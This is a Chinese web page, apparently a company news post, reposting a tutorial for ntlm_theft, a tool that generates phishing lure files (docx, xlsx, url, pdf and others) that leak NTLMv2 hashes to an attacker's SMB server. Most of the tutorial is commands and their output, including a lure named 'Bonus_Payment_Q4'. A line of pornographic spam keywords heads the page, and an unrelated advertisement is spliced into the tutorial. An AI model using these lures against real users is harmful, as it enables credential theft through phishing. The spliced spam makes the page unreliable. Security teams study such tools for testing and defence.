日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件

關(guān)于ntlm_theft

ntlm_theft是一款基于Python 3開發(fā)的開源工具,可以生成21種不同類型的哈希竊取文檔。該工具適用于網(wǎng)絡(luò)釣魚攻擊,可以用于支持外網(wǎng)SMB流量和內(nèi)部網(wǎng)絡(luò)環(huán)境之中。與基于宏的文檔或利用漏洞的文檔相比,這些文件類型的好處在于,所有的這些文件都是使用“預期功能”構(gòu)建的。

創(chuàng)新互聯(lián)公司2013年成立,是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司,擁有項目成都網(wǎng)站制作、網(wǎng)站設(shè)計網(wǎng)站策劃,項目實施與項目整合能力。我們以讓每一個夢想脫穎而出為使命,1280元西青做網(wǎng)站,已為上家服務(wù),為西青各地企業(yè)和個人服務(wù),聯(lián)系電話:18982081108

使用場景

ntlm_theft主要針對滲透測試人員和紅隊研究人員設(shè)計,可以幫助研究人員對目標公司員工進行內(nèi)部網(wǎng)絡(luò)釣魚,或大規(guī)模測試防病毒和電子郵件網(wǎng)關(guān)的安全性。如果外網(wǎng)防火墻上允許出站SMB訪問,則它也可用于外部網(wǎng)絡(luò)釣魚。

工具依賴

ntlm_theft基于Python 3開發(fā),因此我們需要在本地環(huán)境安裝并配置好Python 3環(huán)境,并安裝好xlsxwriter:

 
 
 
    
  
  
  
  1. pip3 install xlsxwriter 
    2.

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

 
 
 
    
  
  
  
  1. git clone https://github.com/Greenwolf/ntlm_theft.git 
    2.

工具參數(shù)

ntlm_theft的運行需要提供四個必要參數(shù),一個輸入格式,輸入文件或目錄,以及基礎(chǔ)的運行模式:

  • -g, --generate : 選擇生成所有文件或指定文件類型
  • -s, --server : SMB哈希捕捉服務(wù)器的IP地址
  • -f, --filename : 不包含后綴的基礎(chǔ)文件名,之后可以進行重命名

工具運行

下面給出的工具演示樣例中,我們將使用ntlm_theft生成所有文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test 
    2.   
  
  
  2.  
    3.   
  
  
  3. Created: test/test.scf (BROWSE) 
    4.   
  
  
  4.  
    5.   
  
  
  5. Created: test/test-(url).url (BROWSE) 
    6.   
  
  
  6.  
    7.   
  
  
  7. Created: test/test-(icon).url (BROWSE) 
    8.   
  
  
  8.  
    9.   
  
  
  9. Created: test/test.rtf (OPEN) 
    10.   
  
  
  10.  
    11.   
  
  
  11. Created: test/test-(stylesheet).xml (OPEN) 
    12.   
  
  
  12.  
    13.   
  
  
  13. Created: test/test-(fulldocx).xml (OPEN) 
    14.   
  
  
  14.  
    15.   
  
  
  15. Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
    16.   
  
  
  16.  
    17.   
  
  
  17. Created: test/test-(includepicture).docx (OPEN) 
    18.   
  
  
  18.  
    19.   
  
  
  19. Created: test/test-(remotetempl*ate).docx (OPEN) 
    20.   
  
  
  20.  
    21.   
  
  
  21. Created: test/test-(frameset).docx (OPEN) 
    22.   
  
  
  22.  
    23.   
  
  
  23. Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
    24.   
  
  
  24.  
    25.   
  
  
  25. Created: test/test.asx (OPEN) 
    26.   
  
  
  26.  
    27.   
  
  
  27. Created: test/test.jnlp (OPEN) 
    28.   
  
  
  28.  
    29.   
  
  
  29. Created: test/test.application (DOWNLOAD AND OPEN) 
    30.   
  
  
  30.  
    31.   
  
  
  31. Created: test/test.pdf (OPEN AND ALLOW) 
    32.   
  
  
  32.  
    33.   
  
  
  33. Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) 
    34.   
  
  
  34.  
    35.   
  
  
  35. Generation Complete. 
    36.

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成現(xiàn)代文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting 
    2.   
  
  
  2.  
    3.   
  
  
  3. Skipping SCF as it does not work on modern Windows 
    4.   
  
  
  4.  
    5.   
  
  
  5. Created: meeting/meeting-(url).url (BROWSE TO FOLDER) 
    6.   
  
  
  6.  
    7.   
  
  
  7. Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) 
    8.   
  
  
  8.  
    9.   
  
  
  9. Created: meeting/meeting.rtf (OPEN) 
    10.   
  
  
  10.  
    11.   
  
  
  11. Created: meeting/meeting-(stylesheet).xml (OPEN) 
    12.   
  
  
  12.  
    13.   
  
  
  13. Created: meeting/meeting-(fulldocx).xml (OPEN) 
    14.   
  
  
  14.  
    15.   
  
  
  15. Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
    16.   
  
  
  16.  
    17.   
  
  
  17. Created: meeting/meeting-(includepicture).docx (OPEN) 
    18.   
  
  
  18.  
    19.   
  
  
  19. Created: meeting/meeting-(remotetempl*ate).docx (OPEN) 
    20.   
  
  
  20.  
    21.   
  
  
  21. Created: meeting/meeting-(frameset).docx (OPEN) 
    22.   
  
  
  22.  
    23.   
  
  
  23. Created: meeting/meeting-(externalcell).xlsx (OPEN) 
    24.   
  
  
  24.  
    25.   
  
  
  25. Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
    26.   
  
  
  26.  
    27.   
  
  
  27. Created: meeting/meeting.asx (OPEN) 
    28.   
  
  
  28.  
    29.   
  
  
  29. Created: meeting/meeting.jnlp (OPEN) 
    30.   
  
  
  30.  
    31.   
  
  
  31. Created: meeting/meeting.application (DOWNLOAD AND OPEN) 
    32.   
  
  
  32.  
    33.   
  
  
  33. Created: meeting/meeting.pdf (OPEN AND ALLOW) 
    34.   
  
  
  34.  
    35.   
  
  
  35. Skipping zoom as it does not work on the latest versions 
    36.   
  
  
  36.  
    37.   
  
  
  37. Skipping Autorun.inf as it does not work on modern Windows 
    38.   
  
  
  38.  
    39.   
  
  
  39. Skipping desktop.ini as it does not work on modern Windows 
    40.   
  
  
  40.  
    41.   
  
  
  41. Generation Complete. 
    42.

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成一份xlsx文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 
    2.   
  
  
  2.  
    3.   
  
  
  3. Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) 
    4.   
  
  
  4.  
    5.   
  
  
  5. Generation Complete. 
    6.

工具運行截圖

項目地址

ntlm_theft:【GitHub傳送門】


名稱欄目:如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件
網(wǎng)頁地址:http://www.5511xx.com/article/dpsiehp.html